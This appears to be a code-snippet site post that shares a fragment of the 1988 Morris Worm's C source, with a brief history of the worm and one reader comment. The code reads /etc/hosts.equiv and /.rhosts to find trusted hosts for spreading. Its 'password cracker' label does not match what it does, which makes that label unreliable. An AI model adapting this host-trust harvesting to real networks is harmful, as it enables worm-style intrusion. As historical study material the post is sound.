1 point

The Morris Worm - the first code to attack the Internet


dashboard

Wed Dec 25 2019 09:51:14 GMT+0000 (UTC)

Posted by @albertthechecksum #C #historicalcode #cyberattacks #malware

//PASSWORD CRACKER FUNCTION

FILE *hosteq;
char scanbuf[512];
char fwd_buf[256];
char *fwd_host;
char getbuf[256];
struct passwd *pwent;
char local[20];
struct usr *user;
struct hst *host;				/* 1048 */
int check_other_cnt;			/* 1052 */
static struct usr *user_list = NULL;
hosteq = fopen(XS("/etc/hosts.equiv"), XS("r"));
if (hosteq != NULL) {			/* 292 */
while (fscanf(hosteq, XS("%.100s"), scanbuf)) {
    host = h_name2host(scanbuf, 0);
    if (host == 0) {
	host = h_name2host(scanbuf, 1);
	getaddrs(host);
    }
    if (host->o48[0] == 0)		/* 158 */
	continue;
    host->flag |= 8;
}
fclose(hosteq);				/* 280 */
}

hosteq = fopen(XS("/.rhosts"), XS("r"));
if (hosteq != NULL) {			/* 516 */
while (fgets(getbuf, sizeof(getbuf), hosteq)) { /* 344,504 */
    if (sscanf(getbuf, XS("%s"), scanbuf) != 1)
	continue;
    host = h_name2host(scanbuf, 0);
    while (host == 0) {			/* 436, 474 */
	host = h_name2host(scanbuf, 1);
	getaddrs(host);
    }
    if (host->o48[0] == 0)
	continue;
    host->flag |= 8;
}
fclose(hosteq);
}
content_copy

The Morris Worm was a worm created by Cornell graduate student Robert Morris Jr. The Worm itself was initially created by Morris as an experiment in order to measure the size of the ARPANET (an early predecessor of the Internet). However a critical error in the code (we’ll talk about it below later), caused it to begin replicating itself on the same computer multiple times slowing down these already weak computers (computers at that time had a very-very small amount of storage and small amount of RAM as well) to the point of being unusable. Or in other words, the Morris Worm “accidentally” performed a DoS (Denial of Service) attack. After being sentenced to three years of probation, he went on to become a co-founder of celebrated startup incubator Y Combinator and an assistant professor of computer science at MIT.

https://0x00sec.org/t/examining-the-morris-worm-source-code-malware-series-0x02/685

>> Browse more code snippets

@mishka - Thu Dec 26 2019 15:46:40 GMT+0000 (UTC)

Fascinating that this guy then went on to found Y Combinator

more_vert